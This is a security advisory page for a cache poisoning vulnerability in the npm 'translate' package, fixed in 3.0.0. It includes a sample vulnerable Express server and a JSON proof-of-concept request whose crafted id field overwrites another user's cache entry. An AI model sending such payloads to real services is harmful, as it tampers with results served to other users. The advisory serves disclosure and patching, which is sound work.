GHSA-882j-4vj5-7vmj

Suggest an improvement
Source
https://github.com/advisories/GHSA-882j-4vj5-7vmj
Import Source
https://github.com/github/advisory-database/blob/main/advisories/github-reviewed/2024/03/GHSA-882j-4vj5-7vmj/GHSA-882j-4vj5-7vmj.json
JSON Data
https://api.osv.dev/v1/vulns/GHSA-882j-4vj5-7vmj
Aliases
Related
Published
2024-03-22T16:57:21Z
Modified
2024-03-22T20:02:15Z
Severity
  • 5.3 (Medium) CVSS_V3 - CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:L/A:N CVSS Calculator
Summary
Cache Poisoning Vulnerability
Details

Summary

An attacker controlling the second variable of the translate function is able to perform a cache poisoning attack. They can change the outcome of translation requests made by subsequent users.

Details

The opt.id parameter allows the overwriting of the cache key. If an attacker sets the id variable to the cache key that would be generated by another user, they can choose the response that user gets served.

PoC

Take the following simple server allowing users to supply text and the language to translate to.

import translate from "translate";
import express from 'express';

const app = express();
app.use(express.json());

app.post('/translate', async (req, res) => {
  const { text, language } = req.body;
  const result = await translate(text, language);
  return res.json(result);
});

const port = 3000;
app.listen(port, () => {
  console.log(`Server is running on port ${port}`);
});

We can send the following request to poison the cache:

{"text":"I hate you", "language":{"to":"nl","id":"undefined:en:nl:google:I love you"}}

Poisoning the cache

Now, any user that attempts to translate "I love you" to Dutch, will get "I hate you" in Dutch as the response. The victim gets our poisoned data

Impact

An attacker can control the results other users may get

Database specific
{
    "github_reviewed": true,
    "github_reviewed_at": "2024-03-22T16:57:21Z",
    "nvd_published_at": "2024-03-22T17:15:07Z",
    "cwe_ids": [
        "CWE-20"
    ],
    "severity": "MODERATE"
}
References

Affected packages

npm / translate

Package

Affected ranges

Type
SEMVER
Events
Introduced
0Unknown introduced version / All previous versions are affected
Fixed
3.0.0